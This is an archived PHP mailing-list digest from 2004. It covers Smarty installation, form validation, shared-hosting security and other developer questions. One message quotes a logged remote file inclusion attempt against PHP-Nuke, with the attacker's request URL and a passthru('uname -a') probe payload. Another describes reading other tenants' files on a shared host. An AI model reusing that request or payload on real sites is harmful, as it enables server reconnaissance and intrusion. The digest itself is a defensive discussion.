php-general Digest 26 Sep 2004 11:43:40 -0000 Issue 3018

Topics (messages 197846 through 197868):

Re: Problems installing smarty on a shared host
        197846 by: Curt Zirzow
        197848 by: Pablo Gosse

Re: ftp_put Problems
        197847 by: Marek Kilimajer
        197849 by: raditha dissanayake

Re: is that possible with Objects in php 4 or php5 ?
        197850 by: raditha dissanayake

Conceptual ?: using 'multi-purpose' form for validation
        197851 by: Whil Hentzen
        197866 by: Marek Kilimajer

php security on shared hosts
        197852 by: Pablo Gosse
        197853 by: Tim Traver
        197858 by: Chris Shiflett
        197859 by: Chris Shiflett
        197861 by: raditha dissanayake

Server's IP Adress
        197854 by: Kevin Javia
        197855 by: Pahlevanzadeh Mohsen

Re: New PHP tutorial - suggestions welcome
        197856 by: John Taylor-Johnston
        197857 by: Jack Gates

OT - HTML Terminal ?
        197860 by: Dave Restall - System Administrator,,,
        197863 by: Marek Kilimajer

What's going on?
        197862 by: Phpu
        197867 by: Marek Kilimajer

Getting Header info with PHP?
        197864 by: Nick Wilson

Instant messenger
        197865 by: Phpu

Hacker IP and Script
        197868 by: Jason Paschal

Administrivia:

To subscribe to the digest, e-mail:
        [EMAIL PROTECTED]

To unsubscribe from the digest, e-mail:
        [EMAIL PROTECTED]

To post to the list, e-mail:
        [EMAIL PROTECTED]


----------------------------------------------------------------------
--- Begin Message ---
* Thus wrote Pablo Gosse:
> Hi folks.  I've recently moved my site to a shared host, and this is the
> first time I've had to set up my site in a really restrictive
> environment, and I'm running into problems getting smarty installed.
> 
> Using the basic example set up from the Smarty docs, when I run the file
> I get the following error:
> 
> Warning: main(Smarty.class.php): failed to open stream: No such file or
> directory in /home/virtual/site357/fst/var/www/html/smarty.php on line 4
> 
> Fatal error: main(): Failed opening required 'Smarty.class.php'
> (include_path='.:/php/includes:/usr/share/php:/home/pablogosse/smarty/')
> in /home/virtual/site357/fst/var/www/html/smarty.php on line 4
> 
> Now, as you can see by the value of my include path, I've got the path
> to smarty added, but it's still not finding the file even though
> /home/pablogosse/smarty/Smarty.class.php does indeed exist.

You'll probably notice that the permissions for /home/pablogosse
are like: drwxr-x--- with user:group pablogosse:pablogosse

If you have permission to, I would set up a directory like:

  /home/virtual/site357/fst/var/include/smarty/

And then set the include_path appropriately.


Curt
-- 
The above comments may offend you. flame at will.

--- End Message ---
--- Begin Message ---
[snip]
You'll probably notice that the permissions for /home/pablogosse
are like: drwxr-x--- with user:group pablogosse:pablogosse

If you have permission to, I would set up a directory like:

  /home/virtual/site357/fst/var/include/smarty/

And then set the include_path appropriately.
[/snip]

Unfortunately I don't have write access to /var as it is owned by root.

I've just discovered another thing which makes me even more nervous.

I just wrote a script as a quick test and I was able to use
file_get_contents to read a file out of another user's webroot.  So,
anyone who is storing passwords or other valuable information under
their webroot risks having that information being easily accessible to
anyone else hosting here.

As I said earlier, most of my experience until now has been in
situations where the sites I've worked on have been hosted on dedicated
servers, and this has never been a problem.

Is this a common set up for shared hosting?  Is there any way around
this?

Cheers and TIA,
Pablo

--- End Message ---
--- Begin Message ---
Julian wrote:
Well, I suspect I am at a dead end. Here is the layout of things.

We want to put up an internet kiosk at certain thoroughbred auctions to allow people to send ecards as well as contact associates. We have a web cam on the kiosk and a partner came up with the idea of letting them send photos of themselves as well. The problem is I cannot find a way to use the form type FILE without giving the user access to everything on the kiosk computer. Try as I might I cannot get around that "browse" button. So I thought I would try the ftp functions, which I am totally unfamiliar with. I do truly appreciate the time you and others took to look into this.

You can set up Apache and PHP on the kiosk machine. Document root will be the folder where the webcam stores images, or just one directory up. You can create a simple php script that will let them browse the pictures (only the pictures :)), or a not so simple one that will allow them to make some adjustments to the pictures using image functions. When everything is ready, with a press of a button they can mail the ecards. What would be done on the server, the kiosk will do.

--- End Message ---
--- Begin Message ---
Julian wrote:

I am trying to get a file from my local C drive to my server using something other than a form.



This is pretty much an impossible task for server side scripting. You can perhaps use an applet to upload either via FTP or HTTP,
but Marek's last mail is probably the best solution.


--
Raditha Dissanayake.
------------------------------------------------------------------------
http://www.radinks.com/sftp/         | http://www.raditha.com/megaupload
Lean and mean Secure FTP applet with | Mega Upload - PHP file uploader
Graphical User Interface. Just 128 KB | with progress bar.

--- End Message ---
--- Begin Message ---
Alawi Albaity wrote:

I have object A, and object B that extends from object A and has its
own abilities,
and object C that extends from object A and has its own abilities.
I want to use the abilities of object B on object C and the abilities of
object C on object B, but the problem I found is that I
must merge these classes with the original class together so I can do
all abilities.
This does not work out for me if I have to merge a big class, so is
there any possibility to do that so I can gain the abilities of these
two classes together without merging?




Short answer: no.
Long answer: you can use an interface to describe the behaviour of class B and implement that interface in class C so that class C can be made to behave like class B does.


Having said all that, if you want class B to behave like class C there is a problem in the design, and any time spent now in rectifying the issue (possibly by merging the two classes) will definitely save you countless hours of hair pulling in the future.



--
Raditha Dissanayake.
------------------------------------------------------------------------
http://www.radinks.com/sftp/         | http://www.raditha.com/megaupload
Lean and mean Secure FTP applet with | Mega Upload - PHP file uploader
Graphical User Interface. Just 128 KB | with progress bar.

--- End Message ---
--- Begin Message ---
I can get a single form to call itself again if there's nothing fancy going 
on. This code will prompt the user for their email if it doesn't already 
exist, and if the email does exist, provides some data out of the database.

<?php if ( !isset($_POST['email']) ): ?>
  <!-- No email, so prompt the user for one.-->

  <form action="<?= htmlspecialchars($_SERVER['PHP_SELF']) ?>" method="post">
  Login: <input type="text" name="email" />
  <input type="submit" value="GO" />
  </form>

<?php else: ?>

  <!-- The form posts, so the value is in $_POST, not $_GET; escape it before echoing. -->
  <p>Data for email: <?= htmlspecialchars($_POST['email']) ?></p>
  <?php // do some database stuff and display the results ?>

<?php endif; ?>

I'd like to validate the email that was entered against a database - if the 
email address is found, continue on with the ELSE code. If not found, though, 
run the IF section again. 

Conceptually I'm missing how to do that. I've done it in two pages, where the 
form action calls a second PHP page, and the code in that second page looks 
for the address and displays one result or another depending on if it's 
found. 

How do I do this in one page, if it's appropriate and practical (i.e. good 
coding) to do so?

Thanks,

Whil

--- End Message ---
--- Begin Message ---
Whil Hentzen wrote:
I can get a single form to call itself again if there's nothing fancy going on. This code will prompt the user for their email if it doesn't already exist, and if the email does exist, provides some data out of the database.

<?php
$email = (isset($_POST['email']) ? $_POST['email'] : '');

// validate_email(): the database lookup described below; it returns true only
// when the address is found, so an unknown address shows the form again.
if ( !validate_email($email) ): ?>
  <!-- No email, so prompt the user for one.-->

  <form action="<?= htmlspecialchars($_SERVER['PHP_SELF']) ?>" method="post">
  Login: <input type="text" name="email" />
  <input type="submit" value="GO" />
  </form>

<?php else: ?>

  <p>Data for email: <?= htmlspecialchars($email) ?></p>
  <?php // do some database stuff and display the results ?>

<?php endif; ?>

I'd like to validate the email that was entered against a database - if the email address is found, continue on with the ELSE code. If not found, though, run the IF section again.

Conceptually I'm missing how to do that. I've done it in two pages, where the form action calls a second PHP page, and the code in that second page looks for the address and displays one result or another depending on if it's found.

How do I do this in one page, if it's appropriate and practical (i.e. good coding) to do so?

Thanks,

Whil


--- End Message ---
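Putting Whil's one-page flow together with the lookup Marek sketches, here is an added example (not code from either post) that checks the posted address against a database with a prepared statement and re-shows the form on a miss. It assumes PHP 7.1 or later with the pdo_sqlite extension; the users table and its rows are constructed in memory so the script runs on its own.

```php
<?php
// Added example, not code from the thread: Whil's self-posting form with
// the database validation done on the same page. The users table and its
// single row are constructed here so the script runs stand-alone.

declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (email TEXT PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO users VALUES ('alice@example.com', 'Alice')");

/**
 * Look the submitted address up with a prepared statement, so whatever
 * was typed into the form can never change the shape of the query.
 * Returns the matching row, or null when the address is unknown.
 */
function find_user(PDO $pdo, string $email): ?array
{
    $stmt = $pdo->prepare('SELECT email, name FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Escape everything that goes back into the HTML, including our own URL. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The form posts, so read $_POST (not $_GET) and normalise the value.
$email = trim((string)($_POST['email'] ?? ''));
$user  = null;
$error = '';

if ($email !== '') {
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $error = 'That does not look like an e-mail address.';
    } else {
        $user = find_user($pdo, $email);
        if ($user === null) {
            $error = 'Address not found, please try again.';
        }
    }
}

// Falls through to the form both on the first visit and after a failed
// lookup, which is the "run the IF section again" behaviour asked for.
if ($user === null): ?>
  <?php if ($error !== ''): ?><p><?= h($error) ?></p><?php endif; ?>
  <form action="<?= h((string)($_SERVER['PHP_SELF'] ?? '')) ?>" method="post">
  Login: <input type="text" name="email" value="<?= h($email) ?>" />
  <input type="submit" value="GO" />
  </form>
<?php else: ?>
  <p>Data for email: <?= h($user['email']) ?> (<?= h($user['name']) ?>)</p>
<?php endif; ?>
```

Escaping $_SERVER['PHP_SELF'] matters as much as escaping the e-mail: a request path containing markup would otherwise be reflected straight into the form tag.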
--- Begin Message ---
Hi folks. I recently set up hosting for my site and have noticed
something which is making me nervous.

I can't seem to include files outside of my webroot, so I wrote a script
to test permissions using passthru to output the results of a bunch of
ls -la commands to see what I did and did not have access to. Eventually
I was able to read the directory which holds the root folders for all
sites on the server, and from there I was able to read files (revealing
the php source) from the webroot of another site.

This to me is a huge security issue since if anyone has any sensitive
information there, it could easily be accessed by anyone else hosting on
the same server. And because I can't seem to include files from outside
my webroot, if I stay with this company I'll be forced to include
information such as database passwords inside my webroot, therefore
exposing the information to every other user on the server, and that's
just not acceptable.

All of my experience until now has been in situations where the sites
I've worked on have been hosted on dedicated servers, so this has never
been a problem.

Is this a common set up for shared hosting? Is there any way around
this?

Cheers and TIA.

Pablo

--- End Message ---
--- Begin Message ---
Pablo,

As a shared hosting company myself (http://www.simplenet.com/), I can guarantee that is not the way it is supposed to be. We make sure that can't happen by running in Safe mode, using the open_basedir directive, and making sure the directory tree has the correct permissions so the situation you described cannot happen.

So, I'd say that your shared host is doing a poor job of implementing PHP.

Tim.



At 08:31 PM 9/25/2004, Pablo Gosse wrote:
Hi folks. I recently set up hosting for my site and have noticed
something which is making me nervous.

I can't seem to include files outside of my webroot, so I wrote a script
to test permissions using passthru to output the results of a bunch of
ls -la commands to see what I did and did not have access to. Eventually
I was able to read the directory which holds the root folders for all
sites on the server, and from there I was able to read files (revealing
the php source) from the webroot of another site.

This to me is a huge security issue since if anyone has any sensitive
information there, it could easily be accessed by anyone else hosting on
the same server. And because I can't seem to include files from outside
my webroot, if I stay with this company I'll be forced to include
information such as database passwords inside my webroot, therefore
exposing the information to every other user on the server, and that's
just not acceptable.

All of my experience until now has been in situations where the sites
I've worked on have been hosted on dedicated servers, so this has never
been a problem.

Is this a common set up for shared hosting? Is there any way around
this?

Cheers and TIA.

Pablo

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


SimpleNet's Back !
http://www.simplenet.com

--- End Message ---
--- Begin Message ---
--- Pablo Gosse <[EMAIL PROTECTED]> wrote:
> Hi folks. I recently set up hosting for my site and have noticed
> something which is making me nervous.
> 
> I can't seem to include files outside of my webroot, so I wrote
> a script to test permissions using passthru to output the results
> of a bunch of ls -la commands to see what I did and did not have
> access to. Eventually I was able to read the directory which
> holds the root folders for all sites on the server, and from
> there I was able to read files (revealing the php source) from
> the webroot of another site.
> 
> This to me is a huge security issue since if anyone has any
> sensitive information there, it could easily be accessed by
> anyone else hosting on the same server. And because I can't seem
> to include files from outside my webroot, if I stay with this
> company I'll be forced to include information such as database
> passwords inside my webroot, therefore exposing the information
> to every other user on the server, and that's just not acceptable.

I just published a free article on my Web site about shared hosting:

http://shiflett.org/articles/security-corner-mar2004

In short, what you've found is typical for most shared hosts, and
safe_mode (a directive created to help mitigate this problem a bit) does
little to help. However, there are some things you can do as a developer,
and I give some specific examples.

Hope that helps.

Chris

=====
Chris Shiflett - http://shiflett.org/

PHP Security - O'Reilly
     Coming December 2004
HTTP Developer's Handbook - Sams
     http://httphandbook.org/
PHP Community Site
     http://phpcommunity.org/

--- End Message ---
--- Begin Message ---
--- Tim Traver <[EMAIL PROTECTED]> wrote:
> I can guarantee that is not the way it is supposed to be. We
> make sure that can't happen by running in Safe mode, using the
> open_basedir directive, and making sure the directory tree has
> the correct permissions so the situation you described cannot
> happen.

The safe_mode and open_basedir directives are certainly no protection. I'm
curious what sort of permissions you are using that prevents this
scenario, since it seems impossible to me. If the legitimate developer can
include code using include or require, it means the Web server must be
able to read those files. The exception would be if you're running each
user in a chroot jail or something, mimicking a dedicated environment.

> So, I'd say that your shared host is doing a poor job of
> implementing PHP.

I used to think the same, but I've changed my mind, because:

1. safe_mode is no protection.
2. Many prepackaged PHP applications don't work with safe_mode enabled.

Hope that helps.

Chris

=====
Chris Shiflett - http://shiflett.org/

PHP Security - O'Reilly
     Coming December 2004
HTTP Developer's Handbook - Sams
     http://httphandbook.org/
PHP Community Site
     http://phpcommunity.org/

--- End Message ---
--- Begin Message ---
Pablo Gosse wrote:

Hi folks. I recently set up hosting for my site and have noticed
something which is making me nervous.


If you are really nervous you cannot use shared hosting. Simple as that. Even if other users don't access your stuff, the root user can. While it's against the system administrator's code of conduct to look into other users' files, you cannot rule out the possibility of someone taking a peek.

As Chris has pointed out, safe mode is no protection. On some servers (not all) you can try changing your home directory permissions to remove others' read and others' execute to get an additional measure of protection.


--
Raditha Dissanayake.
------------------------------------------------------------------------
http://www.radinks.com/sftp/         | http://www.raditha.com/megaupload
Lean and mean Secure FTP applet with | Mega Upload - PHP file uploader
Graphical User Interface. Just 128 KB | with progress bar.

--- End Message ---
--- Begin Message ---
Greetings,

How can I get Server's IP address?

I know $_SERVER["SERVER_ADDRSS"] but this does not work all the time. Is there
any other method?

Thanks a ton in advance.

Kevin.

--- End Message ---
--- Begin Message ---
You can use getbyhostname() func.
--- Kevin Javia <[EMAIL PROTECTED]> wrote:

> Greetings,
> 
> How can I get Server's IP address?
> 
> I know $_SERVER["SERVER_ADDRSS"] but this does not
> work all the time. Is there
> any other method?
> 
> Thanks a ton in advance.
> 
> Kevin.
> 


=====
---------DIGITAL  SIGNATURE-------------------
///Mohsen Pahlevanzadeh////////
     Network administrator  & programmer     
      My home phone is: +98213810146          
My email address is                                  
          m_pahlevanzadeh at yahoo dot com               
My website is: http://webnegar.net            
----------------------------------------------------------------


                

--- End Message ---
--- Begin Message ---
Consistently crashes my Netscape 4.8 (circa 2003). Yeah, I still use it, because I 
prefer its news reader. Very few attacks on this mature mail program. That said, 
you're forcing me to use IE6 :-|

--- End Message ---
--- Begin Message ---
On Sunday 26 September 2004 12:32 am, John Taylor-Johnston wrote:
> Consistently crashes my Netscape 4.8 (circa 2003). Yeah, I still use it,
> because I prefer its news reader. Very few attacks on this mature mail
> program. That said, you're forcing me to use IE6 :-|

No one is forcing you to use anything.  You made your own choice to use an 
older browser.

His site works great with Mozilla 1.4 on Linux and Mozilla 1.7.1 on Windows.

-- 
Jack "The Rhino" Gates, Registered Linux user #342662
Morning Star Communications, www.morningstarcom.net
Web Hosting, Site Design, Domain Registration,
VMware Workstation Software and GSX Server Software

--- End Message ---
--- Begin Message ---
Hi,

this is severely off topic so please feel free to ignore it :-)

I have an intranet application that currently is accessed using a
browser, no problems there, however I have been asked if I can get rid
of the browser so that the users are not encouraged to surf so readily.
I initially thought simple - start the browser with the correct home page
as a command line argument and turn off all the tool bars etc. so that it
looks like an xterm (dos window) and of course they can only then click
on the links we provide.  It's not meant to be foolproof and a dedicated
hacker could circumvent the system, however most users won't bother.

I don't particularly want to go the F11 (full screen) route and would
like something easy to install if possible, e.g. a single .exe, Lynx
seemed a good point to start but I think that would freak out just about
all the end users :-)

Does anybody have any POLITE suggestions or any experience of something
similar and can let me in on the secret ?

I have tried Google, Mozilla & M$; the nearest I have come so far is IEAK.

TTFN,


Dave
+----------------------------------------------------------------------------+
| Dave Restall,       IIRC Limited, PO Box 46, Skelton, Cleveland, TS12 2GT. |
| Tel. 0845 10 80 151    Mob. +44 (0) 7973 831245   Int. +44 (0) 1287 653003 |
| email : [EMAIL PROTECTED]       [EMAIL PROTECTED]     Web : http://www.iirc.net |
+----------------------------------------------------------------------------+
| I have learned To spell hors d'oeuvres Which still grates on Some          |
| people's n'oeuvres.                                                        |
|         -- Warren Knox                                                     |
+----------------------------------------------------------------------------+

--- End Message ---
--- Begin Message ---
Dave Restall - System Administrator,,, wrote:
Hi,

this is severely off topic so please feel free to ignore it :-)

I have an intranet application that currently is accessed using a
browser, no problems there, however I have been asked if I can get rid
of the browser so that the users are not encouraged to surf so readily.
I initially thought simple - start the browser with the correct home page
as a command line argument and turn off all the tool bars etc. so that it
looks like an xterm (dos window) and of course they can only then click
on the links we provide.  It's not meant to be foolproof and a dedicated
hacker could circumvent the system, however most users won't bother.

I don't particularly want to go the F11 (full screen) route and would
like something easy to install if possible, e.g. a single .exe, Lynx
seemed a good point to start but I think that would freak out just about
all the end users :-)

Does anybody have any POLITE suggestions or any experience of something
similar and can let me in on the secret ?

I have tried Google, Mozilla & M$; the nearest I have come so far is IEAK.

You can rewrite the interface in XUL for mozilla:

http://www.xulplanet.com/
--- End Message ---
--- Begin Message ---
For the last 2 days I haven't received emails. What's going on with this mailing list?

--- End Message ---
--- Begin Message ---
Phpu wrote:
For the last 2 days I haven't received emails. What's going on with this mailing list?

It might have something to do with the fact your clock is 2 days behind. Have you been time travelling?

--- End Message ---
--- Begin Message ---
Hi everyone, 

Can anyone tell me which functions/areas I need to look at to do the
following?

*   I need to check a proxy server. 
*   I want to have the proxy fetch a php page at my site
*   my php page should show me *every* header the proxy server sends

Is that possible?

much thanks, and have a nice sunday morning ;-)
-- 
Nick W

--- End Message ---
--- Begin Message ---
Hi,
I want to create an instant private messenger, the kind of IM I have seen on dating 
sites.
I've googled for such an IM but I found nothing. 
Can someone please help me with this?

Thank you

--- End Message ---
--- Begin Message ---
This is of questionable relevance, but I'm sure it can serve to
heighten awareness of vulnerabilities for those PHP'ers with similar
scripts that involve loading files based upon query string info.

We have installed Admin Secure over our PHP-Nuke CMS, and Admin Secure
recently sent us an email of a thwarted hacking attempt:

--------------------------------------------------------
Admin Secure detecting invalid file inclusion passed to index.php or
modules.php files. This could be possible cross-site scripting (XSS)
hack attempt to your site.  For security reason, this attempt has been
blocked by Admin Secure to protect your website. Admin Secure has been
collecting the following information:

- Date: 26 September 2004, 01:05
- IP Address: 193.150.170.160
- User-agent: curl/7.9.5 (i586-pc-linux-gnu) libcurl 7.9.5 (ipv6 enabled)
- Request: 
/modules.php?name=http://193.150.170.160/4do4sjr?&sa=http://193.150.170.160/4do4sjr?&year=http://193.150.170.160/4do4sjr?&month=http://193.150.170.160/4do4sjr?&month_l=http://193.150.170.160/4do4sjr?
- Variable: $name = http://193.150.170.160/4do4sjr?

Whois Information.....
-------------------------------------------------------

The link he was trying to get our scripts to load,
http://193.150.170.160/4do4sjr? , displays this:

<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>

Which would, from what I've read about the uname command, give him
info about our web server, and from there he would have an idea of
which vulnerabilities to exploit.

----------------------------------------------------

What would you guys do with the attack information (IP, WHOIS)?  Send
a detailed email to the addresses listed in the WHOIS records?  I'm
not sweating it, just curious.

Thank you,
~Jason

--- End Message ---
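The pattern Jason describes, a script that includes a file named by the query string, is what makes the logged request dangerous. As an added example that is not PHP-Nuke's or Admin Secure's code, here is a module loader written so that such a value is refused and logged with a reason; the modules directory, module names and log wording are hypothetical, and it assumes PHP 8.

```php
<?php
// Added example, not PHP-Nuke or Admin Secure code. A query-string module
// loader that includes only allow-listed names and logs why a value was
// refused. MODULES_DIR, the module names and the log wording are
// hypothetical. Needs PHP 8 (str_starts_with / str_contains).

declare(strict_types=1);

const MODULES_DIR = __DIR__ . '/modules';

// Allow-list: the only values of ?name= that may ever be included.
const KNOWN_MODULES = ['News', 'Search', 'Calendar'];

/**
 * Resolve ?name= to a file inside MODULES_DIR, or null to refuse.
 * Only an exact allow-listed name passes; the resolved path is then
 * checked to stay inside the modules directory as defence in depth.
 */
function resolve_module(string $name): ?string
{
    if (!in_array($name, KNOWN_MODULES, true)) {
        return null;                        // URLs, "../", anything unknown
    }
    $path = realpath(MODULES_DIR . '/' . $name . '.php');
    $base = realpath(MODULES_DIR);
    if ($path === false || $base === false) {
        return null;                        // module file is missing
    }
    // Containment check: the real path must start with the real base dir.
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

/**
 * Say why a value was rejected, so the log carries the same kind of
 * signal Admin Secure reported: a URL or traversal in a parameter that
 * should only ever hold a bare module name.
 */
function classify_rejection(string $name): string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $name)) {
        return 'remote-url';                // remote file inclusion attempt
    }
    if (str_contains($name, '..') || str_contains($name, "\0")) {
        return 'path-traversal';
    }
    return 'unknown-module';
}

// ---- request handling ---------------------------------------------------
$name = (string)($_GET['name'] ?? 'News');
$file = resolve_module($name);

if ($file === null) {
    // Control characters are escaped so a crafted value cannot forge log lines.
    $safe = substr(addcslashes($name, "\0..\37\177"), 0, 200);
    error_log(sprintf('modules.php refused name=%s (%s) from %s',
        $safe, classify_rejection($name), $_SERVER['REMOTE_ADDR'] ?? 'cli'));
    http_response_code(404);
    echo "No such module.\n";
    exit;
}

require $file;
```

Keeping allow_url_include=Off (the php.ini default) closes the remote-URL path for the whole server; the allow-list is what stops the local variants and keeps the refusal visible in the logs.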
